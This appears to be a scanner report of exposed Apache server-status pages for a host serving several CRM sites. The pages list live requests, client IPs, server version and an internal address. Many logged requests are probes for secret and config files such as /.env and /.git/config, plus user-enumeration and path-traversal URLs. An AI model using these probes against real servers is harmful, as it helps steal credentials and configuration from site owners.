71.053966860.010.20829.78 76.168.201.207http/1.1trmm.us:443POST /s/ HTTP/1.1 0-0942940/393/37352_ 71.0443140.05.42797.46 96.7.74.175http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 0-0942940/383/37178_ 70.662170.012.09822.90 127.0.0.1http/1.1 1-0332380/658/33272_ 197.296190.011.60816.73 23.35.71.87http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0332380/651/33043_ 196.9630600.09.69788.57 135.125.246.110http/1.1localhost:80POST / HTTP/1.1 1-0332380/642/33169_ 196.521251220.012.66760.20 127.0.0.1http/1.1 1-0332380/641/33160_ 196.6430600.010.75799.49 135.125.246.110http/1.1 1-0332380/642/33176_ 196.95315150.017.38826.54 23.205.108.69http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0332380/628/33037_ 197.32000.014.79803.01 96.7.74.198http/1.1trmm.us:443GET /debug/default/view?panel=config HTTP/1.1 1-0332380/644/33107_ 197.1215100.014.26778.13 127.0.0.1http/1.1localhost:443GET /dynatraceApacheQueuingTimeCheck?timestamp=29026653309894 H 1-0332380/624/32995_ 197.0620720.014.29774.58 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-0332380/642/33061_ 196.721511380.07.54729.36 127.0.0.1http/1.1 1-0332380/631/33107_ 197.1810221130.025.37893.58 174.84.123.196http/1.1trmm.us:443POST /s/ HTTP/1.1 1-0332380/660/33241_ 196.5938510.015.23832.85 51.222.253.18http/1.1 1-0332380/670/33080_ 197.15120270.024.70791.66 96.7.74.175http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0332380/643/32999_ 197.15125120.08.88777.40 96.7.74.175http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 1-0332380/620/33091_ 196.95319140.016.47810.37 23.220.96.151http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 1-0332380/637/33040_ 196.94340160.016.25856.57 23.205.108.69http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0332380/647/33145_ 197.2089770.012.33732.34 165.254.96.20http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0332380/652/33053_ 196.67207750.010.71792.55 127.0.0.1http/1.1 1-0332380/657/33058_ 196.8833150.06.87852.83 127.0.0.1http/1.1 2-0445130/386/34891_ 63.44100820.07.38796.64 23.205.108.69http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0445130/385/34983_ 63.4687160.05.02813.19 96.7.74.198http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0445130/399/35013_ 63.39139180.08.96879.03 23.205.108.69http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0445130/386/34788_ 63.59000.08.12829.90 104.248.140.11http/1.1trmm.us:80GET /s/135323e2831313e2630323e24333/_/;/META-INF/maven/com.atla 2-0445130/381/34870_ 63.5245720.07.45795.33 23.205.108.69http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0445130/396/34963_ 63.40129190.06.36843.09 23.205.108.80http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0445130/384/34937_ 63.38140160.03.55800.93 23.205.108.69http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0445130/380/34720_ 63.5425160.011.32764.38 23.205.108.69http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0445130/384/34961_ 63.565800.011.64754.56 23.205.108.69http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0445130/386/34777_ 63.41115150.09.30803.86 23.205.108.69http/1.1crm.spr
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31ff87c597ff87c5976726cc8e
Apache Status Apache Server Status for www.trmm.us (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Sunday, 25-Dec-2022 00:42:54 UTC Restart Time: Sunday, 04-Dec-2022 23:02:10 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 20 days 1 hour 40 minutes 44 seconds Server load: 0.49 0.32 0.25 Total accesses: 4719158 - Total Traffic: 165.0 GB CPU Usage: u1151.52 s139.33 cu0 cs0 - .0744% CPU load 2.72 requests/sec - 99.8 kB/second - 36.7 kB/request 8 requests currently being processed, 172 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 087005no0yes018000 158167no4yes513000 212593no1yes117000 444247no0yes018000 517488no2yes216010 662667no1yes018010 769455no0yes018000 824218no0yes018000 9100094no1yes018010 1031275no4yes018040 Sum10013 8172070 __________________W_____R______RWR__________________W_.......... ........______________________RR________________________________ ________________________________________________________________ ______.......................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0870050/429/21440_ 55.827230.016.27670.17 2.18.255.140http/1.1 0-0870050/436/21472_ 55.94500.09.25724.50 2.18.255.105http/1.1crm.textripple.com:443GET /videos/.DS_Store HTTP/1.1 0-0870050/427/21425_ 55.95300.016.68703.92 2.18.255.105http/1.1localhost:80GET /v2/_catalog HTTP/1.1 0-0870050/422/21473_ 55.93700.014.17691.89 2.18.255.105http/1.1crm.textripple.com:443GET /includes/.DS_Store HTTP/1.1 0-0870050/443/21638_ 55.95300.020.58729.42 2.18.255.105http/1.1localhost:80GET / HTTP/1.1 0-0870050/411/21349_ 55.95400.013.09743.71 2.18.255.105http/1.1localhost:80GET / HTTP/1.1 0-0870050/423/21525_ 55.97200.013.26667.23 2.18.255.105http/1.1localhost:80GET /.env HTTP/1.1 0-0870050/441/21469_ 55.95300.033.04722.46 2.18.255.105http/1.1trmm.us:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-0870050/431/21401_ 55.96300.08.95721.43 2.18.255.105http/1.1crm.sprout.online:80GET /debug/default/view?panel=config HTTP/1.1 0-0870050/433/21381_ 55.95300.07.82686.65 2.18.255.105http/1.1trmm.us:80GET /.git/config HTTP/1.1 0-0870050/439/21460_ 55.94600.013.10683.40 2.18.255.105http/1.1crm.textripple.com:443GET /js/.DS_Store HTTP/1.1 0-0870050/433/21359_ 55.97200.012.66709.79 2.18.255.105http/1.1crm.sprout.online:80GET /debug/default/view?panel=config HTTP/1.1 0-0870050/434/21350_ 55.92710.012.94769.82 2.18.255.105http/1.1crm.textripple.com:443GET /dal/.DS_Store HTTP/1.1 0-0870050/438/21596_ 55.94610.017.94710.77 2.18.255.105http/1.1crm.textripple.com:443GET /mms/.DS_Store HTTP/1.1 0-0870050/442/21525_ 55.94600.014.30703.18 2.18.255.105http/1.1crm.textripple.com:443GET /test/.DS_Store HTTP/1.1 0-0870050/433/21447_ 55.92710.017.67633.17 2.18.255.105http/1.1crm.textripple.com:443GET /fieldPicker/.DS_Store HTTP/1.1 0-0870050/421/21550_ 55.94600.011.67717.86 2.18.255.105http/1.1crm.textripple.com:443GET /pdfs/.DS_Store HTTP/1.1 0-0870050/429/21433_ 55.96300.012.38641.45 2.18.255.105http/1.1crm.sprout.online:80GET /.env HTTP/1.1 1-0581670/413/22900W 49.58300.09.04799.10 166.182.86.182http/1.1trmm.us:443POST /s/ HTTP/1.1 1-0581670/412/23009_ 49.633150.09.69830.76 23.56.175.28http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0581670/423/22899_ 49.64200.07.23817.71 2.18.255.105http/1.1crm.sprout.online:80GET /.git/config HTTP/1.1 1-0581670/430/22869_ 49.64200.01.88716.54 2.18.255.73http/1.1localhost:80GET / HTTP/1.1 1-0581670/408/22890_ 49.643850.04.98785.81 184.31.0.223http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0581670/423/22690_ 49.64200.025.24821.17 2.18.255.105http/1.1crm.sprout.online:80GET / HTTP/1.1 1-0581670/406/22762R 49.62300.010.09767.25 2.18.255.105http/1.1trmm.us:443 1-0581670/414/22946_ 49.633160.07.21830.28 23.56.175.28http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0581670/411/22889_ 49.65000.08.07786.59 2.18.255.105http/1.1trmm.us:443GET /.env HTTP/1.1 1-0581670/416/22705_ 49.642150.012.82885.45 23.54.163.198http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0581670/415/22916_ 49.64300.012.67759.59 2.18.255.105http/1.1crm.sprout.online:80GET /api/search?folderIds=0 HTTP/1.1 1-0581670/409/22837_ 49.643700.04.85784.29 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0581670/416/22892_ 49.64200.015.48847.74 2.18.255.105http/1.1localhost:80GET /telescope/requests HTTP/1.1 1-0581670/402/22733R 49.63300.02.59812.33 2.18.255.105http/1.1trmm.us:443 1-0581670/418/23006W 49.62000.022.61745.80 2.18.255.73http/1.1trmm.us:443GET /server-status HTTP/1.1 1-0581670/418/22856R 49.62300.05.76707.61 2.18.255.73http/1.1trmm.us:443 1-0581670/394/22784_ 49.64200.04.49796.24 2.18.255.105http/1.1localhost:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 1-0581670/408/22885_ 49.65000.02.08744.58 2.18.255.105http/1.1trmm.us:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-0125930/392/21252_ 80.1592150.013.86683.57 127.0.0.1http/1.1 2-0125930/393/21217_ 80.6789180.015.09660.04 23.54.163.198http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0125930/389/21239_ 80.8141150.014.61713.43 2.18.255.73http/1.1crm.sprout.online:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 2-0125930/399/21324_ 80.64121150.011.03714.79 23.56.175.53http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0125930/392/21175_ 80.77900.016.31674.05 45.33.108.188http/1.1client.simplismarter.com:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 2-0125930/389/21244_ 80.82410.016.44787.69 2.18.255.73http/1.1crm.sprout.online:443GET /config.json HTTP/1.1 2-0125930/389/21226_ 80.60154790.022.90697.47 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0125930/390/21377_ 80.7057170.011.01672.29 184.31.0.223http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0125930/402/21314_ 80.7243420.020.08695.48 23.56.175.28http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0125930/387/21274_ 80.7147810.011.76693.19 96.7.74.198http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31ff87c597ff87c5971e2862a7
Apache Status Apache Server Status for www.trmm.us (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Sunday, 25-Dec-2022 00:42:46 UTC Restart Time: Sunday, 04-Dec-2022 23:02:10 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 20 days 1 hour 40 minutes 35 seconds Server load: 0.49 0.31 0.25 Total accesses: 4718914 - Total Traffic: 165.0 GB CPU Usage: u1150.7 s139.14 cu0 cs0 - .0744% CPU load 2.72 requests/sec - 99.8 kB/second - 36.7 kB/request 10 requests currently being processed, 170 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 087005no3yes018012 158167no10yes216043 212593no0yes018000 444247no0yes018000 517488no1yes018000 662667no2yes117001 769455no6yes414002 824218no0yes117000 9100094no1yes117001 1031275no4yes117001 Sum10027 101700510 __________________W_____________W_____________________.......... ........_________________________________________________R____W_ __________W_W__WR_____________________________W_______________R_ ______.......................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0870050/429/21440_ 55.8210230.016.27670.17 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0870050/435/21471_ 55.85100.09.25724.49 45.33.108.188http/1.1client.simplismarter.com:80GET /.git/config HTTP/1.1 0-0870050/425/21423_ 55.72105160.016.66703.90 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0870050/421/21472_ 55.45570.014.17691.89 2.18.255.140http/1.1 0-0870050/441/21636_ 55.70120160.020.58729.42 96.7.74.198http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0870050/410/21348_ 55.86000.013.09743.70 45.33.108.188http/1.1client.simplismarter.com:80GET /config.json HTTP/1.1 0-0870050/421/21523_ 55.78491150.013.26667.23 23.56.175.28http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0870050/440/21468_ 55.68145130.033.04722.46 23.54.163.198http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0870050/429/21399_ 55.7664780.08.95721.43 23.56.175.28http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0870050/431/21379_ 55.52144160.07.81686.65 127.0.0.1http/1.1 0-0870050/438/21459_ 55.834150.013.09683.40 23.56.175.28http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0870050/431/21357_ 55.7850190.012.65709.78 23.56.175.28http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0870050/433/21349_ 55.7942100.012.94769.82 96.7.74.198http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 0-0870050/437/21595_ 55.842760.017.94710.77 96.7.74.198http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0870050/441/21524_ 55.85100.014.29703.18 45.33.108.188http/1.1localhost:80HELP 0-0870050/432/21446_ 55.811800.017.67633.17 23.56.175.29http/1.1localhost:80GET / HTTP/1.1 0-0870050/420/21549_ 55.841120.011.67717.86 96.7.74.198http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 0-0870050/428/21432_ 55.7670140.012.38641.45 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0581670/411/22898_ 49.46010.09.03799.09 2.18.255.73http/1.1trmm.us:443GET / HTTP/1.1 1-0581670/409/23006_ 49.370150.09.69830.75 45.33.108.188http/1.1 1-0581670/419/22895_ 49.340170.07.21817.69 45.33.108.188http/1.1 1-0581670/426/22865_ 49.46000.01.88716.53 2.18.255.105http/1.1trmm.us:443GET /.git/config HTTP/1.1 1-0581670/404/22886_ 49.310480.04.97785.80 45.33.108.188http/1.1 1-0581670/419/22686_ 49.4401570.025.23821.16 2.18.255.56http/1.1crm.sprout.online:443GET / HTTP/1.1 1-0581670/403/22759_ 49.40100.010.08767.24 45.33.108.188http/1.1client.simplismarter.com:80GET /.env HTTP/1.1 1-0581670/410/22942_ 49.40000.07.20830.27 45.33.108.188http/1.1client.simplismarter.com:80GET /v2/_catalog HTTP/1.1 1-0581670/406/22884_ 49.40100.08.07786.59 45.33.108.188http/1.1client.simplismarter.com:80GET /s/135323e2831313e2630323e24333/_/;/META-INF/maven/com.atla 1-0581670/412/22701_ 49.38020.012.79885.42 2.18.255.140http/1.1 1-0581670/411/22912_ 49.320160.012.65759.57 107.115.207.47http/1.1 1-0581670/405/22833_ 49.320140.04.84784.28 45.33.108.188http/1.1 1-0581670/412/22888_ 49.390150.015.48847.73 2.18.255.140http/1.1 1-0581670/398/22729_ 49.40110.02.57812.31 2.18.255.56http/1.1trmm.us:443GET / HTTP/1.1 1-0581670/414/23002W 49.40000.022.54745.73 23.54.163.142http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0581670/415/22853_ 49.4101240.05.76707.61 2.18.255.140http/1.1crm.sprout.online:443GET / HTTP/1.1 1-0581670/391/22781_ 49.450100.04.48796.23 2.18.255.56http/1.1crm.textripple.com:443GET / HTTP/1.1 1-0581670/404/22881_ 49.46000.02.07744.57 2.18.255.105http/1.1trmm.us:443GET /.env HTTP/1.1 2-0125930/392/21252_ 80.1583150.013.86683.57 127.0.0.1http/1.1 2-0125930/393/21217_ 80.6780180.015.09660.04 23.54.163.198http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0125930/388/21238_ 80.5419720.014.54713.37 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-0125930/399/21324_ 80.64112150.011.03714.79 23.56.175.53http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0125930/392/21175_ 80.77100.016.31674.05 45.33.108.188http/1.1client.simplismarter.com:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 2-0125930/388/21243_ 80.54196160.016.44787.68 23.54.163.198http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0125930/389/21226_ 80.60145790.022.90697.47 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0125930/390/21377_ 80.7048170.011.01672.29 184.31.0.223http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0125930/402/21314_ 80.7234420.020.08695.48 23.56.175.28http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0125930/387/21274_ 80.7138810.011.76693.19 96.7.74.198http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0125930/375/21327_ 80.55195150.013.53636.03 23.54.163.198
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31ff87c597ff87c5977669cb9f
Apache Status Apache Server Status for www.trmm.us (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Thursday, 29-Sep-2022 03:13:14 UTC Restart Time: Tuesday, 19-Jul-2022 06:05:20 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 71 days 21 hours 7 minutes 53 seconds Server load: 0.09 0.38 0.51 Total accesses: 20259741 - Total Traffic: 725.4 GB CPU Usage: u3377.79 s368.34 cu0 cs0 - .0603% CPU load 3.26 requests/sec - 122.5 kB/second - 37.5 kB/request 28 requests currently being processed, 152 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 040447no9yes513041 194454no0yes018000 251755no0yes018000 461164no7yes810022 546522no4yes711001 6125153no4yes117030 7110199no3yes315000 899710no9yes216035 9100664no3yes117010 1085785no3yes117011 Sum10042 2815201410 R__R__R____R_____R____________________________________.......... ........RW__WR_WR_R_____R__RRR___W_RR___R_______________R_______ W___R__________R________W_R________________W____________________ ___W__.......................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0404470/370/94001R 33.950120.09.003072.14 2.18.255.73http/1.1crm.sprout.online:443 0-0404470/385/94020_ 33.99000.08.093027.15 188.166.147.46http/1.1 0-0404470/381/93837_ 34.04090.04.103042.70 2.18.255.73http/1.1crm.textripple.com:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 0-0404470/373/93642R 34.02000.09.843106.87 2.18.255.73http/1.1crm.sprout.online:443 0-0404470/391/93880_ 33.960800.05.439251.75 2.18.255.56http/1.1 0-0404470/377/93693_ 34.05010.07.323136.40 2.18.255.140http/1.1trmm.us:443GET / HTTP/1.1 0-0404470/363/93809R 34.0101620.03.253033.50 2.18.255.105http/1.1crm.sprout.online:443 0-0404470/378/93919_ 34.07000.02.503105.24 2.18.255.73http/1.1crm.textripple.com:443GET /about HTTP/1.1 0-0404470/380/93923_ 33.93000.05.483111.28 2.18.255.56http/1.1 0-0404470/389/93742_ 33.910170.017.613204.24 2.18.255.56http/1.1 0-0404470/391/93851_ 34.06000.014.032995.42 2.18.255.73http/1.1crm.textripple.com:443GET /.vscode/.DS_Store HTTP/1.1 0-0404470/369/93882R 33.950100.010.282985.03 2.18.255.56http/1.1 0-0404470/383/93860_ 34.07000.05.043027.44 2.18.255.73http/1.1crm.textripple.com:443GET /config.json HTTP/1.1 0-0404470/395/93660_ 33.980100.05.003032.88 2.18.255.140http/1.1 0-0404470/388/93927_ 34.050210.011.862988.44 2.18.255.73http/1.1crm.textripple.com:443GET /server-status HTTP/1.1 0-0404470/384/93625_ 33.93000.04.873182.69 188.166.147.46http/1.1 0-0404470/389/93794_ 33.96000.06.803015.32 188.166.147.46http/1.1 0-0404470/378/93869R 33.8402280.09.413060.00 2.18.255.56http/1.1 1-0944540/427/98988_ 86.751140.013.703174.88 2.18.255.56http/1.1 1-0944540/425/99008_ 86.391041150.018.053230.87 127.0.0.1http/1.1 1-0944540/409/98769_ 86.59138160.012.153192.26 127.0.0.1http/1.1 1-0944540/418/98444_ 86.881910.014.533256.26 139.162.7.175http/1.1trmm.us:443HEAD / HTTP/1.1 1-0944540/420/98864_ 86.89700.015.899440.25 2.18.255.140http/1.1localhost:80HEAD / HTTP/1.1 1-0944540/421/98725_ 86.4919150.015.713139.65 139.162.7.175http/1.1 1-0944540/430/98937_ 86.74110.05.733143.20 2.18.255.140http/1.1 1-0944540/428/99016_ 86.78126180.012.173122.97 23.54.163.142http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0944540/429/99145_ 86.7416130.010.383174.74 127.0.0.1http/1.1 1-0944540/442/98816_ 86.8636720.015.313112.75 23.56.175.28http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0944540/427/98656_ 86.8187140.023.983228.60 96.7.74.198http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 1-0944540/422/98985_ 86.8010600.019.373343.64 96.7.74.175http/1.1trmm.us:443GET /public/mms/20220925_111411_UTC_68d8ab3cc8_0.jpeg HTTP/1.1 1-0944540/430/99133_ 86.77126140.014.583314.31 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0944540/414/99182_ 86.4456120.024.323260.74 127.0.0.1http/1.1 1-0944540/417/98922_ 86.75155740.05.693206.38 23.56.175.28http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0944540/428/98749_ 86.771321590.011.119424.45 184.31.0.223http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0944540/434/98932_ 86.76138150.017.253208.65 23.54.163.142http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0944540/440/99071_ 86.8010420.021.763257.09 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-0517550/835/102871_ 131.0442170.020.583216.97 23.56.175.53http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0517550/855/102726_ 130.8529180.032.213162.47 127.0.0.1http/1.1 2-0517550/832/102937_ 130.5777170.028.383393.79 127.0.0.1http/1.1 2-0517550/825/102950_ 131.062910.020.353177.55 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-0517550/812/102770_ 131.025900.023.903349.39 79.104.53.14http/1.1trmm.us:80GET / HTTP/1.1 2-0517550/819/103075_ 131.0443840.024.553310.70 23.56.175.53http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0517550/821/102792_ 130.96123910.035.343287.32 172.58.122.91http/1.1veew.info:443GET /?2cY&phn=5863397195 HTTP/1.1 2-0517550/858/103204_ 130.96122730.024.213330.72 172.58.122.91http/1.1veew.info:443POST /ajax.php HTTP/1.1 2-0517550/832/102665_ 130.93141160.033.373174.35 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0517550/844/103060_ 130.96122690.025.363188.87 172.58.122.91http/1.1veew.info:443POST /ajax.php HTTP/1.1 2-0517550/829/102751_ 131.0078790.018.393309.79 23.56.175.53http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0517550/850/102708_ 130.9116200.035.173309.71 59.36.175.46http/1.1thpierpc.com:80GET / HTTP/1.1 2-0517550/830/102524_
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31ff87c597ff87c597c0b92866
Apache Status Apache Server Status for www.trmm.us (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Thursday, 29-Sep-2022 03:13:15 UTC Restart Time: Tuesday, 19-Jul-2022 06:05:20 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 71 days 21 hours 7 minutes 54 seconds Server load: 0.09 0.38 0.51 Total accesses: 20259780 - Total Traffic: 725.4 GB CPU Usage: u3378.03 s368.39 cu0 cs0 - .0603% CPU load 3.26 requests/sec - 122.5 kB/second - 37.5 kB/request 3 requests currently being processed, 177 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 040447no10yes117071 194454no0yes018000 251755no0yes018000 461164no12yes018082 546522no6yes018041 6125153no4yes117040 7110199no4yes117030 899710no9yes018035 9100664no2yes018020 1085785no3yes018021 Sum10050 317703310 _______________R______________________________________.......... ........______________________________________W_________________ ______R_________________________________________________________ ______.......................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0404470/371/94002_ 34.08000.09.003072.14 2.18.255.73http/1.1crm.sprout.online:443GET /.DS_Store HTTP/1.1 0-0404470/386/94021_ 34.120130.08.103027.16 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0404470/381/93837_ 34.04090.04.103042.70 2.18.255.56http/1.1 0-0404470/374/93643_ 34.09000.09.843106.88 2.18.255.73http/1.1crm.sprout.online:443GET /.env HTTP/1.1 0-0404470/391/93880_ 33.960800.05.439251.75 188.166.147.46http/1.1 0-0404470/377/93693_ 34.05010.07.323136.40 2.18.255.140http/1.1 0-0404470/364/93810_ 34.09010.03.263033.50 2.18.255.105http/1.1crm.sprout.online:443GET /info.php HTTP/1.1 0-0404470/379/93920_ 34.12000.02.513105.25 2.18.255.73http/1.1crm.sprout.online:443GET /about HTTP/1.1 0-0404470/380/93923_ 33.93000.05.483111.28 2.18.255.140http/1.1 0-0404470/389/93742_ 33.910170.017.613204.24 2.18.255.56http/1.1 0-0404470/391/93851_ 34.06000.014.032995.42 2.18.255.56http/1.1 0-0404470/369/93882_ 33.950100.010.282985.03 2.18.255.56http/1.1 0-0404470/383/93860_ 34.07000.05.043027.44 188.166.147.46http/1.1 0-0404470/395/93660_ 33.980100.05.003032.88 2.18.255.56http/1.1 0-0404470/388/93927_ 34.050210.011.862988.44 2.18.255.56http/1.1 0-0404470/384/93625R 33.93000.04.873182.69 188.166.147.46http/1.1 0-0404470/389/93794_ 33.96000.06.803015.32 2.18.255.140http/1.1 0-0404470/378/93869_ 33.8402280.09.413060.00 2.18.255.56http/1.1 1-0944540/427/98988_ 86.751140.013.703174.88 2.18.255.56http/1.1 1-0944540/425/99008_ 86.391041150.018.053230.87 127.0.0.1http/1.1 1-0944540/409/98769_ 86.59138160.012.153192.26 127.0.0.1http/1.1 1-0944540/418/98444_ 86.882010.014.533256.26 139.162.7.175http/1.1trmm.us:443HEAD / HTTP/1.1 1-0944540/420/98864_ 86.89700.015.899440.25 2.18.255.140http/1.1localhost:80HEAD / HTTP/1.1 1-0944540/421/98725_ 86.4919150.015.713139.65 139.162.7.175http/1.1 1-0944540/430/98937_ 86.74110.05.733143.20 2.18.255.140http/1.1 1-0944540/428/99016_ 86.78126180.012.173122.97 23.54.163.142http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0944540/429/99145_ 86.7416130.010.383174.74 127.0.0.1http/1.1 1-0944540/442/98816_ 86.8636720.015.313112.75 23.56.175.28http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0944540/427/98656_ 86.8187140.023.983228.60 96.7.74.198http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 1-0944540/422/98985_ 86.8010600.019.373343.64 96.7.74.175http/1.1trmm.us:443GET /public/mms/20220925_111411_UTC_68d8ab3cc8_0.jpeg HTTP/1.1 